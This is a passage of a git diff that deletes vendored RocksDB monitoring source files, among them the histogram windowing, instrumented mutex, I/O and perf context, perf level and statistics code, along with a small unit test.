-    }
-
-    // advance to next window bucket
-    current_window_.store(next_window, std::memory_order_relaxed);
-
-    mutex_.unlock();
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/histogram_windowing.h b/thirdparty/rocksdb/monitoring/histogram_windowing.h
deleted file mode 100644
index 2a6d0dd..0000000
--- a/thirdparty/rocksdb/monitoring/histogram_windowing.h
+++ /dev/null
@@ -1,80 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "monitoring/histogram.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-class HistogramWindowingImpl : public Histogram
-{
-public:
-  HistogramWindowingImpl();
-  HistogramWindowingImpl(uint64_t num_windows,
-                         uint64_t micros_per_window,
-                         uint64_t min_num_per_window);
-
-  HistogramWindowingImpl(const HistogramImpl&) = delete;
-  HistogramWindowingImpl& operator=(const HistogramImpl&) = delete;
-
-  ~HistogramWindowingImpl();
-
-  virtual void Clear() override;
-  virtual bool Empty() const override;
-  virtual void Add(uint64_t value) override;
-  virtual void Merge(const Histogram& other) override;
-  void Merge(const HistogramWindowingImpl& other);
-
-  virtual std::string ToString() const override;
-  virtual const char* Name() const override { return "HistogramWindowingImpl"; }
-  virtual uint64_t min() const override { return stats_.min(); }
-  virtual uint64_t max() const override { return stats_.max(); }
-  virtual uint64_t num() const override { return stats_.num(); }
-  virtual double Median() const override;
-  virtual double Percentile(double p) const override;
-  virtual double Average() const override;
-  virtual double StandardDeviation() const override;
-  virtual void Data(HistogramData* const data) const override;
-
-private:
-  void TimerTick();
-  void SwapHistoryBucket();
-  inline uint64_t current_window() const {
-    return current_window_.load(std::memory_order_relaxed);
-  }
-  inline uint64_t last_swap_time() const{
-    return last_swap_time_.load(std::memory_order_relaxed);
-  }
-
-  Env* env_;
-  std::mutex mutex_;
-
-  // Aggregated stats over windows_stats_, all the computation is done
-  // upon aggregated values
-  HistogramStat stats_;
-
-  // This is a circular array representing the latest N time-windows.
-  // Each entry stores a time-window of data. Expiration is done
-  // on window-based.
-  std::unique_ptr<HistogramStat[]> window_stats_;
-
-  std::atomic_uint_fast64_t current_window_;
-  std::atomic_uint_fast64_t last_swap_time_;
-
-  // Following parameters are configuable
-  uint64_t num_windows_ = 5;
-  uint64_t micros_per_window_ = 60000000;
-  // By default, don't care about the number of values in current window
-  // when decide whether to swap windows or not.
-  uint64_t min_num_per_window_ = 0;
-};
-
-}  // namespace rocksdb
\ No newline at end of file
diff --git a/thirdparty/rocksdb/monitoring/instrumented_mutex.cc b/thirdparty/rocksdb/monitoring/instrumented_mutex.cc
deleted file mode 100644
index c07a5a1..0000000
--- a/thirdparty/rocksdb/monitoring/instrumented_mutex.cc
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/instrumented_mutex.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-namespace {
-bool ShouldReportToStats(Env* env, Statistics* stats) {
-  return env != nullptr && stats != nullptr &&
-          stats->stats_level_ > kExceptTimeForMutex;
-}
-}  // namespace
-
-void InstrumentedMutex::Lock() {
-  PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(db_mutex_lock_nanos,
-                                         stats_code_ == DB_MUTEX_WAIT_MICROS);
-  uint64_t wait_time_micros = 0;
-  if (ShouldReportToStats(env_, stats_)) {
-    {
-      StopWatch sw(env_, nullptr, 0, &wait_time_micros);
-      LockInternal();
-    }
-    RecordTick(stats_, stats_code_, wait_time_micros);
-  } else {
-    LockInternal();
-  }
-}
-
-void InstrumentedMutex::LockInternal() {
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_StateDelay(ThreadStatus::STATE_MUTEX_WAIT);
-#endif
-  mutex_.Lock();
-}
-
-void InstrumentedCondVar::Wait() {
-  PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(db_condition_wait_nanos,
-                                         stats_code_ == DB_MUTEX_WAIT_MICROS);
-  uint64_t wait_time_micros = 0;
-  if (ShouldReportToStats(env_, stats_)) {
-    {
-      StopWatch sw(env_, nullptr, 0, &wait_time_micros);
-      WaitInternal();
-    }
-    RecordTick(stats_, stats_code_, wait_time_micros);
-  } else {
-    WaitInternal();
-  }
-}
-
-void InstrumentedCondVar::WaitInternal() {
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_StateDelay(ThreadStatus::STATE_MUTEX_WAIT);
-#endif
-  cond_.Wait();
-}
-
-bool InstrumentedCondVar::TimedWait(uint64_t abs_time_us) {
-  PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(db_condition_wait_nanos,
-                                         stats_code_ == DB_MUTEX_WAIT_MICROS);
-  uint64_t wait_time_micros = 0;
-  bool result = false;
-  if (ShouldReportToStats(env_, stats_)) {
-    {
-      StopWatch sw(env_, nullptr, 0, &wait_time_micros);
-      result = TimedWaitInternal(abs_time_us);
-    }
-    RecordTick(stats_, stats_code_, wait_time_micros);
-  } else {
-    result = TimedWaitInternal(abs_time_us);
-  }
-  return result;
-}
-
-bool InstrumentedCondVar::TimedWaitInternal(uint64_t abs_time_us) {
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_StateDelay(ThreadStatus::STATE_MUTEX_WAIT);
-#endif
-
-  TEST_SYNC_POINT_CALLBACK("InstrumentedCondVar::TimedWaitInternal",
-                           &abs_time_us);
-
-  return cond_.TimedWait(abs_time_us);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/instrumented_mutex.h b/thirdparty/rocksdb/monitoring/instrumented_mutex.h
deleted file mode 100644
index 83d7523..0000000
--- a/thirdparty/rocksdb/monitoring/instrumented_mutex.h
+++ /dev/null
@@ -1,98 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/thread_status.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-class InstrumentedCondVar;
-
-// A wrapper class for port::Mutex that provides additional layer
-// for collecting stats and instrumentation.
-class InstrumentedMutex {
- public:
-  explicit InstrumentedMutex(bool adaptive = false)
-      : mutex_(adaptive), stats_(nullptr), env_(nullptr),
-        stats_code_(0) {}
-
-  InstrumentedMutex(
-      Statistics* stats, Env* env,
-      int stats_code, bool adaptive = false)
-      : mutex_(adaptive), stats_(stats), env_(env),
-        stats_code_(stats_code) {}
-
-  void Lock();
-
-  void Unlock() {
-    mutex_.Unlock();
-  }
-
-  void AssertHeld() {
-    mutex_.AssertHeld();
-  }
-
- private:
-  void LockInternal();
-  friend class InstrumentedCondVar;
-  port::Mutex mutex_;
-  Statistics* stats_;
-  Env* env_;
-  int stats_code_;
-};
-
-// A wrapper class for port::Mutex that provides additional layer
-// for collecting stats and instrumentation.
-class InstrumentedMutexLock {
- public:
-  explicit InstrumentedMutexLock(InstrumentedMutex* mutex) : mutex_(mutex) {
-    mutex_->Lock();
-  }
-
-  ~InstrumentedMutexLock() {
-    mutex_->Unlock();
-  }
-
- private:
-  InstrumentedMutex* const mutex_;
-  InstrumentedMutexLock(const InstrumentedMutexLock&) = delete;
-  void operator=(const InstrumentedMutexLock&) = delete;
-};
-
-class InstrumentedCondVar {
- public:
-  explicit InstrumentedCondVar(InstrumentedMutex* instrumented_mutex)
-      : cond_(&(instrumented_mutex->mutex_)),
-        stats_(instrumented_mutex->stats_),
-        env_(instrumented_mutex->env_),
-        stats_code_(instrumented_mutex->stats_code_) {}
-
-  void Wait();
-
-  bool TimedWait(uint64_t abs_time_us);
-
-  void Signal() {
-    cond_.Signal();
-  }
-
-  void SignalAll() {
-    cond_.SignalAll();
-  }
-
- private:
-  void WaitInternal();
-  bool TimedWaitInternal(uint64_t abs_time_us);
-  port::CondVar cond_;
-  Statistics* stats_;
-  Env* env_;
-  int stats_code_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/iostats_context.cc b/thirdparty/rocksdb/monitoring/iostats_context.cc
deleted file mode 100644
index 8aa131a..0000000
--- a/thirdparty/rocksdb/monitoring/iostats_context.cc
+++ /dev/null
@@ -1,61 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <sstream>
-#include "monitoring/iostats_context_imp.h"
-#include "rocksdb/env.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread IOStatsContext iostats_context;
-#endif
-
-IOStatsContext* get_iostats_context() {
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-  return &iostats_context;
-#else
-  return nullptr;
-#endif
-}
-
-void IOStatsContext::Reset() {
-  thread_pool_id = Env::Priority::TOTAL;
-  bytes_read = 0;
-  bytes_written = 0;
-  open_nanos = 0;
-  allocate_nanos = 0;
-  write_nanos = 0;
-  read_nanos = 0;
-  range_sync_nanos = 0;
-  prepare_write_nanos = 0;
-  fsync_nanos = 0;
-  logger_nanos = 0;
-}
-
-#define IOSTATS_CONTEXT_OUTPUT(counter)         \
-  if (!exclude_zero_counters || counter > 0) {  \
-    ss << #counter << " = " << counter << ", "; \
-  }
-
-std::string IOStatsContext::ToString(bool exclude_zero_counters) const {
-  std::ostringstream ss;
-  IOSTATS_CONTEXT_OUTPUT(thread_pool_id);
-  IOSTATS_CONTEXT_OUTPUT(bytes_read);
-  IOSTATS_CONTEXT_OUTPUT(bytes_written);
-  IOSTATS_CONTEXT_OUTPUT(open_nanos);
-  IOSTATS_CONTEXT_OUTPUT(allocate_nanos);
-  IOSTATS_CONTEXT_OUTPUT(write_nanos);
-  IOSTATS_CONTEXT_OUTPUT(read_nanos);
-  IOSTATS_CONTEXT_OUTPUT(range_sync_nanos);
-  IOSTATS_CONTEXT_OUTPUT(fsync_nanos);
-  IOSTATS_CONTEXT_OUTPUT(prepare_write_nanos);
-  IOSTATS_CONTEXT_OUTPUT(logger_nanos);
-
-  return ss.str();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/iostats_context_imp.h b/thirdparty/rocksdb/monitoring/iostats_context_imp.h
deleted file mode 100644
index 8853829..0000000
--- a/thirdparty/rocksdb/monitoring/iostats_context_imp.h
+++ /dev/null
@@ -1,54 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/perf_step_timer.h"
-#include "rocksdb/iostats_context.h"
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-
-// increment a specific counter by the specified value
-#define IOSTATS_ADD(metric, value)     \
-  (get_iostats_context()->metric += value)
-
-// Increase metric value only when it is positive
-#define IOSTATS_ADD_IF_POSITIVE(metric, value)   \
-  if (value > 0) { IOSTATS_ADD(metric, value); }
-
-// reset a specific counter to zero
-#define IOSTATS_RESET(metric)          \
-  (get_iostats_context()->metric = 0)
-
-// reset all counters to zero
-#define IOSTATS_RESET_ALL()                        \
-  (get_iostats_context()->Reset())
-
-#define IOSTATS_SET_THREAD_POOL_ID(value)      \
-  (get_iostats_context()->thread_pool_id = value)
-
-#define IOSTATS_THREAD_POOL_ID()               \
-  (get_iostats_context()->thread_pool_id)
-
-#define IOSTATS(metric)                        \
-  (get_iostats_context()->metric)
-
-// Declare and set start time of the timer
-#define IOSTATS_TIMER_GUARD(metric)                                          \
-  PerfStepTimer iostats_step_timer_##metric(&(get_iostats_context()->metric)); \
-  iostats_step_timer_##metric.Start();
-
-#else  // ROCKSDB_SUPPORT_THREAD_LOCAL
-
-#define IOSTATS_ADD(metric, value)
-#define IOSTATS_ADD_IF_POSITIVE(metric, value)
-#define IOSTATS_RESET(metric)
-#define IOSTATS_RESET_ALL()
-#define IOSTATS_SET_THREAD_POOL_ID(value)
-#define IOSTATS_THREAD_POOL_ID()
-#define IOSTATS(metric) 0
-
-#define IOSTATS_TIMER_GUARD(metric)
-
-#endif  // ROCKSDB_SUPPORT_THREAD_LOCAL
diff --git a/thirdparty/rocksdb/monitoring/iostats_context_test.cc b/thirdparty/rocksdb/monitoring/iostats_context_test.cc
deleted file mode 100644
index 74d3e43..0000000
--- a/thirdparty/rocksdb/monitoring/iostats_context_test.cc
+++ /dev/null
@@ -1,29 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/iostats_context.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-TEST(IOStatsContextTest, ToString) {
-  get_iostats_context()->Reset();
-  get_iostats_context()->bytes_read = 12345;
-
-  std::string zero_included = get_iostats_context()->ToString();
-  ASSERT_NE(std::string::npos, zero_included.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_included.find("= 12345"));
-
-  std::string zero_excluded = get_iostats_context()->ToString(true);
-  ASSERT_EQ(std::string::npos, zero_excluded.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_excluded.find("= 12345"));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/perf_context.cc b/thirdparty/rocksdb/monitoring/perf_context.cc
deleted file mode 100644
index 791f4bd..0000000
--- a/thirdparty/rocksdb/monitoring/perf_context.cc
+++ /dev/null
@@ -1,185 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include <sstream>
-#include "monitoring/perf_context_imp.h"
-
-namespace rocksdb {
-
-#if defined(NPERF_CONTEXT) || !defined(ROCKSDB_SUPPORT_THREAD_LOCAL)
-PerfContext perf_context;
-#else
-#if defined(OS_SOLARIS)
-__thread PerfContext perf_context_;
-#else
-__thread PerfContext perf_context;
-#endif
-#endif
-
-PerfContext* get_perf_context() {
-#if defined(NPERF_CONTEXT) || !defined(ROCKSDB_SUPPORT_THREAD_LOCAL)
-  return &perf_context;
-#else
-#if defined(OS_SOLARIS)
-  return &perf_context_;
-#else
-  return &perf_context;
-#endif
-#endif
-}
-
-void PerfContext::Reset() {
-#ifndef NPERF_CONTEXT
-  user_key_comparison_count = 0;
-  block_cache_hit_count = 0;
-  block_read_count = 0;
-  block_read_byte = 0;
-  block_read_time = 0;
-  block_checksum_time = 0;
-  block_decompress_time = 0;
-  get_read_bytes = 0;
-  multiget_read_bytes = 0;
-  iter_read_bytes = 0;
-  internal_key_skipped_count = 0;
-  internal_delete_skipped_count = 0;
-  internal_recent_skipped_count = 0;
-  internal_merge_count = 0;
-  write_wal_time = 0;
-
-  get_snapshot_time = 0;
-  get_from_memtable_time = 0;
-  get_from_memtable_count = 0;
-  get_post_process_time = 0;
-  get_from_output_files_time = 0;
-  seek_on_memtable_time = 0;
-  seek_on_memtable_count = 0;
-  next_on_memtable_count = 0;
-  prev_on_memtable_count = 0;
-  seek_child_seek_time = 0;
-  seek_child_seek_count = 0;
-  seek_min_heap_time = 0;
-  seek_internal_seek_time = 0;
-  find_next_user_entry_time = 0;
-  write_pre_and_post_process_time = 0;
-  write_memtable_time = 0;
-  write_delay_time = 0;
-  db_mutex_lock_nanos = 0;
-  db_condition_wait_nanos = 0;
-  merge_operator_time_nanos = 0;
-  read_index_block_nanos = 0;
-  read_filter_block_nanos = 0;
-  new_table_block_iter_nanos = 0;
-  new_table_iterator_nanos = 0;
-  block_seek_nanos = 0;
-  find_table_nanos = 0;
-  bloom_memtable_hit_count = 0;
-  bloom_memtable_miss_count = 0;
-  bloom_sst_hit_count = 0;
-  bloom_sst_miss_count = 0;
-
-  env_new_sequential_file_nanos = 0;
-  env_new_random_access_file_nanos = 0;
-  env_new_writable_file_nanos = 0;
-  env_reuse_writable_file_nanos = 0;
-  env_new_random_rw_file_nanos = 0;
-  env_new_directory_nanos = 0;
-  env_file_exists_nanos = 0;
-  env_get_children_nanos = 0;
-  env_get_children_file_attributes_nanos = 0;
-  env_delete_file_nanos = 0;
-  env_create_dir_nanos = 0;
-  env_create_dir_if_missing_nanos = 0;
-  env_delete_dir_nanos = 0;
-  env_get_file_size_nanos = 0;
-  env_get_file_modification_time_nanos = 0;
-  env_rename_file_nanos = 0;
-  env_link_file_nanos = 0;
-  env_lock_file_nanos = 0;
-  env_unlock_file_nanos = 0;
-  env_new_logger_nanos = 0;
-#endif
-}
-
-#define PERF_CONTEXT_OUTPUT(counter)             \
-  if (!exclude_zero_counters || (counter > 0)) { \
-    ss << #counter << " = " << counter << ", ";  \
-  }
-
-std::string PerfContext::ToString(bool exclude_zero_counters) const {
-#ifdef NPERF_CONTEXT
-  return "";
-#else
-  std::ostringstream ss;
-  PERF_CONTEXT_OUTPUT(user_key_comparison_count);
-  PERF_CONTEXT_OUTPUT(block_cache_hit_count);
-  PERF_CONTEXT_OUTPUT(block_read_count);
-  PERF_CONTEXT_OUTPUT(block_read_byte);
-  PERF_CONTEXT_OUTPUT(block_read_time);
-  PERF_CONTEXT_OUTPUT(block_checksum_time);
-  PERF_CONTEXT_OUTPUT(block_decompress_time);
-  PERF_CONTEXT_OUTPUT(get_read_bytes);
-  PERF_CONTEXT_OUTPUT(multiget_read_bytes);
-  PERF_CONTEXT_OUTPUT(iter_read_bytes);
-  PERF_CONTEXT_OUTPUT(internal_key_skipped_count);
-  PERF_CONTEXT_OUTPUT(internal_delete_skipped_count);
-  PERF_CONTEXT_OUTPUT(internal_recent_skipped_count);
-  PERF_CONTEXT_OUTPUT(internal_merge_count);
-  PERF_CONTEXT_OUTPUT(write_wal_time);
-  PERF_CONTEXT_OUTPUT(get_snapshot_time);
-  PERF_CONTEXT_OUTPUT(get_from_memtable_time);
-  PERF_CONTEXT_OUTPUT(get_from_memtable_count);
-  PERF_CONTEXT_OUTPUT(get_post_process_time);
-  PERF_CONTEXT_OUTPUT(get_from_output_files_time);
-  PERF_CONTEXT_OUTPUT(seek_on_memtable_time);
-  PERF_CONTEXT_OUTPUT(seek_on_memtable_count);
-  PERF_CONTEXT_OUTPUT(next_on_memtable_count);
-  PERF_CONTEXT_OUTPUT(prev_on_memtable_count);
-  PERF_CONTEXT_OUTPUT(seek_child_seek_time);
-  PERF_CONTEXT_OUTPUT(seek_child_seek_count);
-  PERF_CONTEXT_OUTPUT(seek_min_heap_time);
-  PERF_CONTEXT_OUTPUT(seek_internal_seek_time);
-  PERF_CONTEXT_OUTPUT(find_next_user_entry_time);
-  PERF_CONTEXT_OUTPUT(write_pre_and_post_process_time);
-  PERF_CONTEXT_OUTPUT(write_memtable_time);
-  PERF_CONTEXT_OUTPUT(db_mutex_lock_nanos);
-  PERF_CONTEXT_OUTPUT(db_condition_wait_nanos);
-  PERF_CONTEXT_OUTPUT(merge_operator_time_nanos);
-  PERF_CONTEXT_OUTPUT(write_delay_time);
-  PERF_CONTEXT_OUTPUT(read_index_block_nanos);
-  PERF_CONTEXT_OUTPUT(read_filter_block_nanos);
-  PERF_CONTEXT_OUTPUT(new_table_block_iter_nanos);
-  PERF_CONTEXT_OUTPUT(new_table_iterator_nanos);
-  PERF_CONTEXT_OUTPUT(block_seek_nanos);
-  PERF_CONTEXT_OUTPUT(find_table_nanos);
-  PERF_CONTEXT_OUTPUT(bloom_memtable_hit_count);
-  PERF_CONTEXT_OUTPUT(bloom_memtable_miss_count);
-  PERF_CONTEXT_OUTPUT(bloom_sst_hit_count);
-  PERF_CONTEXT_OUTPUT(bloom_sst_miss_count);
-  PERF_CONTEXT_OUTPUT(env_new_sequential_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_random_access_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_writable_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_reuse_writable_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_random_rw_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_directory_nanos);
-  PERF_CONTEXT_OUTPUT(env_file_exists_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_children_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_children_file_attributes_nanos);
-  PERF_CONTEXT_OUTPUT(env_delete_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_create_dir_nanos);
-  PERF_CONTEXT_OUTPUT(env_create_dir_if_missing_nanos);
-  PERF_CONTEXT_OUTPUT(env_delete_dir_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_file_size_nanos);
-  PERF_CONTEXT_OUTPUT(env_get_file_modification_time_nanos);
-  PERF_CONTEXT_OUTPUT(env_rename_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_link_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_lock_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_unlock_file_nanos);
-  PERF_CONTEXT_OUTPUT(env_new_logger_nanos);
-  return ss.str();
-#endif
-}
-
-}
diff --git a/thirdparty/rocksdb/monitoring/perf_context_imp.h b/thirdparty/rocksdb/monitoring/perf_context_imp.h
deleted file mode 100644
index 421a8ce..0000000
--- a/thirdparty/rocksdb/monitoring/perf_context_imp.h
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/perf_step_timer.h"
-#include "rocksdb/perf_context.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-#if defined(NPERF_CONTEXT)
-
-#define PERF_TIMER_GUARD(metric)
-#define PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(metric, condition)
-#define PERF_TIMER_MEASURE(metric)
-#define PERF_TIMER_STOP(metric)
-#define PERF_TIMER_START(metric)
-#define PERF_COUNTER_ADD(metric, value)
-
-#else
-
-// Stop the timer and update the metric
-#define PERF_TIMER_STOP(metric) perf_step_timer_##metric.Stop();
-
-#define PERF_TIMER_START(metric) perf_step_timer_##metric.Start();
-
-// Declare and set start time of the timer
-#define PERF_TIMER_GUARD(metric)                                       \
-  PerfStepTimer perf_step_timer_##metric(&(get_perf_context()->metric)); \
-  perf_step_timer_##metric.Start();
-
-#define PERF_CONDITIONAL_TIMER_FOR_MUTEX_GUARD(metric, condition)            \
-  PerfStepTimer perf_step_timer_##metric(&(get_perf_context()->metric), true); \
-  if ((condition)) {                                                         \
-    perf_step_timer_##metric.Start();                                        \
-  }
-
-// Update metric with time elapsed since last START. start time is reset
-// to current timestamp.
-#define PERF_TIMER_MEASURE(metric) perf_step_timer_##metric.Measure();
-
-// Increase metric value
-#define PERF_COUNTER_ADD(metric, value)        \
-  if (perf_level >= PerfLevel::kEnableCount) { \
-    get_perf_context()->metric += value;       \
-  }
-
-#endif
-
-}
diff --git a/thirdparty/rocksdb/monitoring/perf_level.cc b/thirdparty/rocksdb/monitoring/perf_level.cc
deleted file mode 100644
index 79c718c..0000000
--- a/thirdparty/rocksdb/monitoring/perf_level.cc
+++ /dev/null
@@ -1,28 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include <assert.h>
-#include "monitoring/perf_level_imp.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-__thread PerfLevel perf_level = kEnableCount;
-#else
-PerfLevel perf_level = kEnableCount;
-#endif
-
-void SetPerfLevel(PerfLevel level) {
-  assert(level > kUninitialized);
-  assert(level < kOutOfBounds);
-  perf_level = level;
-}
-
-PerfLevel GetPerfLevel() {
-  return perf_level;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/perf_level_imp.h b/thirdparty/rocksdb/monitoring/perf_level_imp.h
deleted file mode 100644
index 2a3add1..0000000
--- a/thirdparty/rocksdb/monitoring/perf_level_imp.h
+++ /dev/null
@@ -1,18 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "rocksdb/perf_level.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-extern __thread PerfLevel perf_level;
-#else
-extern PerfLevel perf_level;
-#endif
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/perf_step_timer.h b/thirdparty/rocksdb/monitoring/perf_step_timer.h
deleted file mode 100644
index 4cb48b1..0000000
--- a/thirdparty/rocksdb/monitoring/perf_step_timer.h
+++ /dev/null
@@ -1,54 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/perf_level_imp.h"
-#include "rocksdb/env.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-class PerfStepTimer {
- public:
-  explicit PerfStepTimer(uint64_t* metric, bool for_mutex = false)
-      : enabled_(perf_level >= PerfLevel::kEnableTime ||
-                 (!for_mutex && perf_level >= kEnableTimeExceptForMutex)),
-        env_(enabled_ ? Env::Default() : nullptr),
-        start_(0),
-        metric_(metric) {}
-
-  ~PerfStepTimer() {
-    Stop();
-  }
-
-  void Start() {
-    if (enabled_) {
-      start_ = env_->NowNanos();
-    }
-  }
-
-  void Measure() {
-    if (start_) {
-      uint64_t now = env_->NowNanos();
-      *metric_ += now - start_;
-      start_ = now;
-    }
-  }
-
-  void Stop() {
-    if (start_) {
-      *metric_ += env_->NowNanos() - start_;
-      start_ = 0;
-    }
-  }
-
- private:
-  const bool enabled_;
-  Env* const env_;
-  uint64_t start_;
-  uint64_t* metric_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/statistics.cc b/thirdparty/rocksdb/monitoring/statistics.cc
deleted file mode 100644
index 9387043..0000000
--- a/thirdparty/rocksdb/monitoring/statistics.cc
+++ /dev/null
@@ -1,191 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "monitoring/statistics.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include "rocksdb/statistics.h"
-#include "port/likely.h"
-#include <algorithm>
-#include <cstdio>
-
-namespace rocksdb {
-
-std::shared_ptr<Statistics> CreateDBStatistics() {
-  return std::make_shared<StatisticsImpl>(nullptr, false);
-}
-
-StatisticsImpl::StatisticsImpl(std::shared_ptr<Statistics> stats,
-                               bool enable_internal_stats)
-    : stats_(std::move(stats)), enable_internal_stats_(enable_internal_stats) {}
-
-StatisticsImpl::~StatisticsImpl() {}
-
-uint64_t StatisticsImpl::getTickerCount(uint32_t tickerType) const {
-  MutexLock lock(&aggregate_lock_);
-  return getTickerCountLocked(tickerType);
-}
-
-uint64_t StatisticsImpl::getTickerCountLocked(uint32_t tickerType) const {
-  assert(
-    enable_internal_stats_ ?
-      tickerType < INTERNAL_TICKER_ENUM_MAX :
-      tickerType < TICKER_ENUM_MAX);
-  uint64_t res = 0;
-  for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-    res += per_core_stats_.AccessAtCore(core_idx)->tickers_[tickerType];
-  }
-  return res;
-}
-
-void StatisticsImpl::histogramData(uint32_t histogramType,
-                                   HistogramData* const data) const {
-  MutexLock lock(&aggregate_lock_);
-  getHistogramImplLocked(histogramType)->Data(data);
-}
-
-std::unique_ptr<HistogramImpl> StatisticsImpl::getHistogramImplLocked(
-    uint32_t histogramType) const {
-  assert(
-    enable_internal_stats_ ?
-      histogramType < INTERNAL_HISTOGRAM_ENUM_MAX :
-      histogramType < HISTOGRAM_ENUM_MAX);
-  std::unique_ptr<HistogramImpl> res_hist(new HistogramImpl());
-  for (size_t core_idx = 0; core_idx < per_core_stats_.Size(); ++core_idx) {
-    res_hist->Merge(
-        per_core_stats_.AccessAtCore(core_idx)->histograms_[histogramType]);
-  }
-  return res_hist;
-}
-
-std::string StatisticsImpl::getHistogramString(uint32_t histogramType) const {
